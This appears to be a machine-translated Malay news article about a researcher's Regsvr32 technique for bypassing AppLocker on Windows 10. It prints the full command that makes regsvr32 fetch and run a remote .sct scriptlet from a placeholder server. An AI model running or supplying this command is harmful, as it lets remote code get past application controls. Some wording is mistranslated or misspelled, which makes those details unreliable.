Regsvr32 boleh digunakan untuk memintas apliker pada tingkap 10

Video: КАК ЗАРЕГИСТРИРОВАТЬ dll библиотеку в windows 2024

Video: КАК ЗАРЕГИСТРИРОВАТЬ dll библиотеку в windows 2024
Anonim

Seorang penyelidik dari Colorado yang melancarkan nama, Casey Smith, mendapati bahawa Regsvr32 boleh digunakan untuk memintas AppLocker pada Windows 10, dan ini merupakan masalah besar bagi pengguna komputer, terutama mereka yang berada dalam persekitaran perniagaan.

AppLocker mula diperkenalkan pada Windows 7 dan Windows Server 2008 R2. Ia direka untuk membenarkan pentadbir menentukan kumpulan atau pengguna mana yang boleh memanfaatkan beberapa atau semua aplikasi berdasarkan identiti unik fail. Jika anda seorang yang cenderung menggunakan AppLocker, maka ia harus menjadi pengetahuan umum bahawa ia boleh digunakan untuk membuat peraturan tertentu untuk membolehkan aplikasi dijalankan atau menghentikannya di trek mereka.

Bagi mereka yang mungkin tidak sedar, Regvr32 boleh digunakan untuk mendaftarkan dan menyatukan DLL. Ini bukan satu-klik alat melihat kerana ia adalah utiliti baris arahan, jadi hanya pengguna komputer canggih harus berusaha untuk memanfaatkan apa yang ditawarkannya.

Kami memahami bahawa dengan menggunakan teknik ini, ia tidak mengubah registri sistem komputer, yang menjadikan sukar bagi pentadbir mengetahui apakah perubahan telah dibuat.

regsvr32 / s / n / u / i:http://server/file.sct scrobj.dll

"Perkara yang mengagumkan di sini ialah regsvr32 sudah diketahui oleh proksi, menggunakan TLS, mengikut arah pengalihan, dan sebagainya … Dan … Anda meneka binary MS ditandatangani, default. Jadi, semua yang perlu anda lakukan ialah tuan rumah fail.sci anda di lokasi yang anda kendalikan, "tulis Smith.

Teknik di atas tidak memerlukan keistimewaan pentadbiran dan ia tidak mengubah pendaftaran. Selain itu, skrip boleh dipanggil melalui HTTP atau HTTPS. Pada masa ini, Microsoft tidak mengeluarkan patch untuk masalah kecil ini, jadi satu-satunya pilihan pada ketika ini ialah menyekat Regsvr32 melalui Windows Firewall.

Menariknya, gergasi perisian masih belum bertindak balas mengenai isu keselamatan ini yang dihadapi oleh sistem pengendaliannya. Sekarang bahawa ia terbuka, kami mengharapkan untuk mendengar sesuatu daripada syarikat itu bersama dengan pembentangan patch masa depan.

Regsvr32 boleh digunakan untuk memintas apliker pada tingkap 10